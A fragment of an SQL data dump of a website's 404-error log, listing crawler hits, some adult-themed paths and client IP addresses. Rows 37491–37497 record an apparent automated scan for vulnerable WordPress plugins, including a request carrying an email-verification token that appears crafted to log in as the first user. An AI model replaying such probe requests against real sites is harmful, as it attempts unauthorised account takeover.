09:41:46','/dx316h9f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37445,'2023-01-27 09:41:47','/i2aqplze2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37446,'2023-01-27 09:41:47','/presentee/a2nh0yne2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37447,'2023-01-27 09:41:48','/i8jd7akf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37448,'2023-01-27 09:41:48','/tvmwxl8e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37449,'2023-01-27 09:41:48','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37450,'2023-01-27 09:41:49','/twdbp92e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37451,'2023-01-27 09:41:49','/performing/dh4vsbje2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37452,'2023-01-27 09:41:50','/isluml0h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37453,'2023-01-27 09:41:50','/isv2k2yf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37454,'2023-01-27 09:41:51','/w12bx82g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37455,'2023-01-27 09:41:51','/blog/dXJyag9kaw4-02','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37456,'2023-01-27 09:41:52','/iyj0ai4f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37457,'2023-01-27 09:41:53','/articles/dimmin0','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37458,'2023-01-27 09:41:53','/iysgmc5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37459,'2023-01-27 09:41:54','/w3cuer3e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37460,'2023-01-27 09:41:54','/kctiq3ee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37461,'2023-01-27 09:41:55','/keyword-ag952.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37462,'2023-01-27 09:41:55','/film/tb5bmrwf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37463,'2023-01-27 09:41:56','/bother3/asepxx7f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37464,'2023-01-27 09:41:56','/capsule/1ywux6vg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37465,'2023-01-27 09:41:57','/faq/tails20','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37466,'2023-01-27 09:41:57','/faq/headil20','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37467,'2023-01-27 09:41:58','/kgss801e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37468,'2023-01-27 09:42:09','/dtsgwn8e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37469,'2023-01-27 09:42:10','/quook17/14ev2hkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37470,'2023-01-27 09:42:11','/199c27of2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37471,'2023-01-27 09:42:11','/ts71hnmg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37472,'2023-01-27 09:42:12','/dwd59epe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37473,'2023-01-27 09:42:12','/tsbuts6h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37474,'2023-01-27 09:42:13','/i2csmltg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37475,'2023-01-27 09:42:13','/ie3cufcf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37476,'2023-01-27 09:42:14','/imfhearf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37477,'2023-01-27 09:42:14','/pengolin/dtzm6cmg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37478,'2023-01-27 09:42:15','/is40s9gg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37479,'2023-01-27 09:42:16','/iy2413xe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37480,'2023-01-27 09:42:16','/iyaw653e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37481,'2023-01-27 09:42:17','/k2ed2x4f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37482,'2023-01-27 09:42:17','/any/9b8tzmqg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37483,'2023-01-27 09:42:18','/k6yt484e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37484,'2023-01-27 09:42:19','/w50iy4je2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37485,'2023-01-27 09:42:19','/forum/trumpe17','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37486,'2023-01-27 09:42:20','/w58ff6ig2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37487,'2023-01-27 09:42:20','/kab7tv6h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37488,'2023-01-27 09:42:21','/keocq7be2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37489,'2023-01-27 09:42:21','/ketcwojd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37490,'2023-01-27 09:42:22','/wdroao3f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37491,'2023-01-27 09:46:08','/favicon.ico/wp-content/plugins/quiz-master-next/README.md','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37492,'2023-01-27 09:46:09','/favicon.ico/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','https://www.dailyjolly.co.uk','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F',NULL,404,'GET',NULL,'185.65.134.167'),(37493,'2023-01-27 09:46:09','/favicon.ico/wp-content/plugins/vr-calendar-sync/assets/js/public.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37494,'2023-01-27 09:46:10','/favicon.ico/wp-admin','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37495,'2023-01-27 09:46:10','/favicon.ico/wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37496,'2023-01-27 09:46:11','/favicon.ico/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2Ku7lMIDpN0DyCIUHhKEfuHiA42.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37497,'2023-01-27 09:46:11','/favicon.ico/wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37498,'2023-01-27 09:50:47','/wpemhkde2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37499,'2023-01-27 10:11:48','/disarrangement/1cgabs6h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37500,'2023-01-27 10:12:45','/glamour_models/kinky-rock-chick/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/kinky-rock-chick/',404,'GET',NULL,'78.47.20.143'),(37501,'2023-01-27 10:53:48','/css/all.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.149.19'),(37502,'2023-01-27 10:53:49','/css/print.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.167'),(37503,'2023-01-27 10:53:50','/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.115'),(37504,'2023-01-27 10:53:51','/js/jquery.browser.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.34'),(37505,'2023-01-27 10:53:52','/js/jquery.tooltip.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.149.100'),(37506,'2023-01-27 10:53:53','/js/fancybox/jquery.fancybox-1.3.6.pack.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.50'),(37507,'2023-01-27 10:53:53','/js/all.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.178'),(37508,'2023-01-27 10:53:54','/js/fancybox/jquery.fancybox-1.3.6.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.220'),(37509,'2023-01-27 10:53:56','/css/fancybox.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.111'),(37510,'2023-01-27 10:53:57','/css/article-comments.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.149.15'),(37511,'2023-01-27 10:53:58','/ajax/libs/jquery/1.9.1/jquery.min.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.11'),(37512,'2023-01-27 10:53:59','/js/jquery.main.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.97'),(37513,'2023-01-27 11:03:03','/stores/9fxt4ojg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37514,'2023-01-27 11:03:18','/glamour_models/the-deputy-head/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/the-deputy-head/',404,'GET',NULL,'167.235.229.222'),(37515,'2023-01-27 11:16:16','/glamour_models/hayley-marie/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/hayley-marie/',404,'GET',NULL,'5.75.230.58'),(37516,'2023-01-27 11:17:34','/diydw1df2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37517,'2023-01-27 11:19:53','/glamour_models/sexy-english-bitch/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/sexy-english-bitch/',404,'GET',NULL,'49.12.210.182'),(37518,'2023-01-27 11:42:05','/te21610e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37519,'2023-01-27 12:14:30','/acx3yepg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37520,'2023-01-27 12:22:04','/phone-sex/index.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/phone-sex/index.html',404,'GET',NULL,'38.125.72.187'),(37521,'2023-01-27 12:30:51','/issx1oze2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37522,'2023-01-27 12:52:27','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37523,'2023-01-27 12:58:54','/9345yx9e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37524,'2023-01-27 13:17:27','/respirator/1dgcb01f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37525,'2023-01-27 13:18:18','/glamour_models/sexy-trekkie/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/sexy-trekkie/',404,'GET',NULL,'167.235.207.119'),(37526,'2023-01-27 13:22:21','/our-ecological-factory','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(37527,'2023-01-27 13:22:23','/wbidd62e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37528,'2023-01-27 13:26:42','/spiderlike/wnijv0ne2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37529,'2023-01-27 13:30:31','/tfgmn26g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37530,'2023-01-27 13:48:23','/discussing-plastics-with-jacob','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'213.180.203.87'),(37531,'2023-01-27 14:00:13','/18kitghf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37532,'2023-01-27 14:50:44','/9305zzbe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37533,'2023-01-27 14:51:45','/surprisingly24/i2im5jse2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37534,'2023-01-27 15:01:35','/i8pywtie2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37535,'2023-01-27 15:19:08','/wh6wj25g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37536,'2023-01-27 15:43:34','/muriform/diycfk3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37537,'2023-01-27 15:46:48','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.76.53'),(37538,'2023-01-27 16:13:03','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/80.0.1055.1 Safari/535.24','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37539,'2023-01-27 16:15:25','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37540,'2023-01-27 16:24:54','/glamour_models/busty-blondes/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/busty-blondes/',404,'GET',NULL,'159.69.114.55'),(37541,'2023-01-27 16:43:42','/wphuct6f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37542,'2023-01-27 16:53:32','/carrageen33/trr7cokd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37543,'2023-01-27 